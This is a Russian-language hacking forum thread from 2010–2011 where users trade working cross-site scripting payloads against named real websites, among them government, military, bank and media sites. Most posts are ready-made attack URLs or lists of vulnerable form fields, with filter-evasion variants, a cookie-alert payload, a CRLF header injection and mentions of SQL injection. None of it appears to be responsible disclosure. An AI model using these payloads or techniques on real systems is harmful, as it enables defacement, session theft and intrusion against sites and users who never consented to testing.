Ваши XSS на популярных сайтах.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Ваши XSS на популярных сайтах. - 2010-05-20 00:38:00.783333
|
|
|
MERRON
Сообщений: 456
Оценки: 312
Присоединился: 2009-05-05 12:42:29.883333
|
FriLL, тему переименовали в Ваши XSS на популярных сайтах.
Хотя скоро надо будет переименовывать в просто Ваши XSS на сайтах
[sm=ab.gif]
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-06-10 13:09:20.066666
|
|
|
espacio
Сообщений: 3
Оценки: 0
Присоединился: 2010-06-10 12:43:32.660000
|
Ну раз Любые на Популярных..
http://www.fbijobs.gov/searchresult.asp
в поле поиска вбиваем :
"><img src=http://i46.tinypic.com/4rauxd.gif/></img><"
www.vertu.com
http://www.vertu.com/in-en/search/?search=%22%3E%3Cimg%20src=http://i46.tinypic.com/4rauxd.gif/img%3E%3C%22#in-en_search
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-06-24 11:17:27.500000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.co.cc/whois/whois.php?domain=%3Cb%3E%3Ccenter%3E%3Cfont%20size=%22100%22%20color%20=%20red%3ESEPO%20WAS%20HERE%20.co.%20cc%3C/font%3E%3C/center%3E%3C/b%3E
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-07-04 13:00:38.866666
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
quote:
По твоему это не популярные сайты?
Нет, меня уже утомило удалять ссылки на ваши говно-сайты
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-07-05 20:26:07.010000
|
|
|
matcal koyshek
Сообщений: 73
Оценки: 0
Присоединился: 2010-06-25 18:16:58.390000
|
www.rol.ru
Пассивная:
"><script>alert('gunusa')</script>
Сайт популярный)
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-07-11 10:11:16.860000
|
|
|
Alex.Black
Сообщений: 2113
Оценки: 0
Присоединился: 2010-04-08 00:23:20.663333
|
http://rus.spartak.com (сайт популярный)
Пассивная
"><script>alert()</script>
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-08-06 15:19:56.240000
|
|
|
Deamon.32
Сообщений: 667
Оценки: 0
Присоединился: 2010-01-03 23:15:57.100000
|
http://megazin-bt.ru/account/personal-data/
Там уязвимы поля с именем фамилией, только надо залогиниться и отредактировать данные
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-08-12 13:20:24.483333
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
Линк с forum.xakep.ru vehicles.pingola.ru(Реклама с Пушкиным), строка поиска не фильтруется: "><script>alert()</script>
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-10-03 13:46:21.933333
|
|
|
PiNkY X]
Сообщений: 123
Оценки: 0
Присоединился: 2009-08-09 13:07:28.723333
|
сайт моего универа http://www.usurt.ru/ru/data/index11.phtml?squery=%3Cscript%3Ealert(document.cookie)%3C/script%3E&mode=search&search.x=6&search.y=10&search=search
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-10-17 21:55:45.346666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://bookmix.ru/?cid=0&keyword=%C4%E0%ED%E8%FD%EB%FC%20%CF%E5%ED%ED%E0%EA&searchform=1%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert%28555%29%3B%3C/ScRiPt%3E
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-10-18 00:48:56.323333
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
http://www.varta-automotive.fr/index.php?id=53&q=%22%3E%3Cscript%3Ealert()%3C/script%3E&x=0&y=0#
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-10-24 01:00:03.963333
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
http://www.freeonlinegames.com/search/?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2010-10-31 14:00:35.150000
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
quote:
http://www.gazetaforum.ru/messages.php?id=-10%22%3E%3Cscript%3Ealert()%3C/script%3E
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-02 17:40:51.326666
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
www.animecouncil.net
активная xss в комментариях к новости в поле " Your name "
Код:
пример
<script>alert(1)</script>
http://www.animecouncil.net/news.php?id=168
–
пассивки в поиске
http://www.arip.co.th/
http://fullrshare.com/
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-02 17:42:03.660000
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://www.dosug.cz/servlet/ru/recover
Вводим:
Цитата:
"><script>alert(/xss/)</script>
http://www.cadebou.pp.ru/ru/gb.php
http://www.laspodmoga.ru/gb.php
При ответе уязвимы все поля, кроме каптчи:
Цитата:
"><script>alert(/xss/)</script>
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-02 17:43:11.176666
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://mankutianmolorak.com/main.php?page=poems&lang=rus
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-02 17:44:25.720000
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
Посещаемость до 280к/день
ТИЦ:3100
http://www.e1.ru/auto/sale/485057.html
http://www.e1.ru/auto/truck/27138.html
Размещаем обявление:
в первом случае уязвимо поле VIN
во втором уязвимо поле ПРОДАВЕЦ
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-02 17:46:08.890000
|
|
|
Торгушка
Сообщений: 133
Оценки: 0
Присоединился: 2010-11-02 16:55:28.636666
|
http://smspartner.biz/
http://partners.smsbz.ru/
http://partners.lika-x.ru/
уязвимое поле ник. редачить можно в профиле.
<script>alert()</script>
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-14 15:01:51.010000
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
http://muzprivet.ru/?music=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&action=lyrics
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-14 16:14:07.153333
|
|
|
yMa.hacKer
Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
|
вконтакте:
1) Создаем группу допустим с названием:
[b]</div><br><br><img src="http://www.xakep.ru/i/sh1.jpg"><br>[/b]
2)Добавляем на стенку графити.
3)Жмем на это графити и радуемся)))
Пример: http://vkontakte.ru/club21503198
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-14 18:48:33.100000
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
http://www.administrating.ru/?s=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-16 13:19:29.160000
|
|
|
yMa.hacKer
Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
|
del
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-21 02:24:34.250000
|
|
|
BlackAngElf
Сообщений: 57
Оценки: 0
Присоединился: 2009-11-10 12:38:19.423333
|
http://www.4candlemagick.com/create_account.php
<script>alert("xss")</script>
уязвимы поля "имя" и "фамилия"
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-25 00:35:19.840000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
agnitum
http://www.agnitum.ru/support/kb/search.php в поле запрос, кидаем что-то типа 1//–></script><ScRiPt%20%0d%0a>alert(532559475937)%3B</ScRiPt>.
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-11-26 21:41:05.650000
|
|
|
MrCepbIu
Сообщений: 27
Оценки: 0
Присоединился: 2010-11-26 14:56:44.076666
|
quote:
ORIGINAL: sepo
agnitum
http://www.agnitum.ru/support/kb/search.php в поле запрос, кидаем что-то типа 1//–></script><ScRiPt%20%0d%0a>alert(532559475937)%3B</ScRiPt>.
quote:
</sсriрt><ScRiPt%20%0d%0a>alert(532559475937)%3B</ScRiPt>
off
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-09 20:05:51.290000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.mysql.com//news-and-events/news/?year=1%3C/title%3E%3CScRiPt%20%0d%0a%3Ealert(478547249327);%3C/ScRiPt%3E
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-10 00:04:53.706666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.mod.gov.ee/?%3E%22'%3E%3CScRiPt%3Ealert(662069549515)%3C/ScRiPt%3E http://www.mod.gov.ee/en/news?%3E%22'%3E%3CScRiPt%3Ealert(652759544099)%3C/ScRiPt%3E http://www.mod.gov.ee/en/51?%3E%22'%3E%3CScRiPt%3Ealert(649479541301)%3C/ScRiPt%3E http://www.mod.gov.ee/et/uudised?%3E%22'%3E%3CScRiPt%3Ealert(651079542556)%3C/ScRiPt%3E
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-11 18:02:41.260000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=0&IDT=1%22+onmouseover=alert(412139911131)+&IDS=0&PAGE=1
http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=1%22+onmouseover=alert(412039911097)+&IDT=0&IDS=0&PAGE=1
http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=0&IDT=0&IDS=1%22+onmouseover=alert(412439912585)+&PAGE=1
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-14 21:17:01.520000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.gc.cuny.edu/events/details_landing.asp?EventId=%F6%22+onmouseover=prompt(409358123087)// http://www.gc.cuny.edu/events/details_landing.asp?EventId=1%22+onmouseover=alert(409178122694)+
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-14 22:59:50.940000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
Не знал куда запостить… но так как это по делу сахивает на XSS, то сюда:
CRLFinjection:
http://www.mfa.is/bitar/felagsmalaraduneyti/leit/ConcatenateSimpleSearch.jsp?q=sepo@address.tst&filter=%0aSomeCustomInjectedHeader:injected_by_sepo
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-15 00:22:25.586666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.interfax.ru/tourism/tourismarch.asp?sw=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(576779602586);%3C/ScRiPt%3E http://www.interfax.ru/realty/realtyacrh.asp?sw=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(553939558449);%3C/ScRiPt%3E http://www.interfax.ru/contacts.asp поля: имя, емаил, текст
+BlindSQL
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-17 09:18:37.363333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
https://www.icq.com/register/error/?origin=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(2356400152568);%3C/ScRiPt%3E
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-30 21:16:06.206666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.ukrtelecom.ua/offers/cards/list?p=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(697436992895);%3C/ScRiPt%3E http://www.ukrtelecom.ua/offers/cards/list?p=1&s=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(697746992969);%3C/ScRiPt%3E
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2010-12-30 22:38:09.056666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.kaspibank.kz/?opt=zal_im&page=2&action=show&pos_id=976&area=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(418568684207);%3C/ScRiPt%3E&im_type=email@address.com&price_cor=email@address.com http://www.kaspibank.kz/?opt=zal_im&page=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(418768684256);%3C/ScRiPt%3E http://www.kaspibank.kz/?opt=zal_im&page=2&action=show&pos_id=976&area=email@address.com&im_type=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(419068684518);%3C/ScRiPt%3E&price_cor=email@address.com http://www.kaspibank.kz/?opt=zal_im&page=2&action=show&pos_id=976&area=email@address.com&im_type=email@address.com&price_cor=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(419168684635);%3C/ScRiPt%3E
+ SQl injections…
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2011-01-04 00:14:23.760000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.panafricanfestival.org/about.php?mid=1%3E'%3E%3CScRiPt%20%0d%0a%3Ealert(412409558084);%3C/ScRiPt%3E http://www.panafricanfestival.org/activities.php?mid=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(416829565308);%3C/ScRiPt%3E http://www.panafricanfestival.org/festival.php?mid=email@some%3CScRiPt%20%0d%0a%3Ealert(425689583149);%3C/ScRiPt%3Edomain.com http://www.panafricanfestival.org/schedule.php?mid=1%3E'%3E%3CScRiPt%20%0d%0a%3Ealert(421229573454);%3C/ScRiPt%3E http://www.panafricanfestival.org/through_the_years.php?mid=1%3C/textarea%3E%3CScRiPt%20%0d%0a%3Ealert(430269595050);%3C/ScRiPt%3E&galleryid=20101123043106
+ SQLi
|
|
|
|
|
RE: Активные XSS на популярных сайтах. - 2011-01-06 14:22:17.976666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.mtic.gov.md/WebPublic/index.php?action=person&lang=md&idnp=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(645229836590);%3C/ScRiPt%3E&captcha=sepos@rambler.ru
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2011-01-22 23:42:31.600000
|
|
|
fake_magent
Сообщений: 187
Оценки: 0
Присоединился: 2010-12-19 18:43:29.280000
|
quote:
ORIGINAL: MERRON
FriLL, тему переименовали в Ваши XSS на популярных сайтах.
Хотя скоро надо будет переименовывать в просто Ваши XSS на сайтах
[sm=ab.gif]
Ваши XSS на значимых ресурсах
http://equities.bnpparibas.com/gb/login.asp??acuparam=>">
ковыряйте дальше сами
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2011-02-16 20:58:12.853333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
QIP
http://aeterna.qip.ru/sresults/tests/?keyparts=tests&keyword=1%22+onmouseover=alert
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2011-02-16 21:46:54.736666
|
|
|
Sрam
Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
|
quote:
ORIGINAL: sepo
QIP
http://aeterna.qip.ru/sresults/tests/?keyparts=tests&keyword=1%22+onmouseover=alert
quote:
aeterna.qip.ru/sresults/tests/?keyparts=tests&keyword=1%22+onmouseover=alert
вИДАТЬ пофиксили…
|
|
|
|
|
RE: Ваши XSS на популярных сайтах. - 2011-02-16 22:42:17.646666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
Однако быстро8|
|
|
|
|
|
|
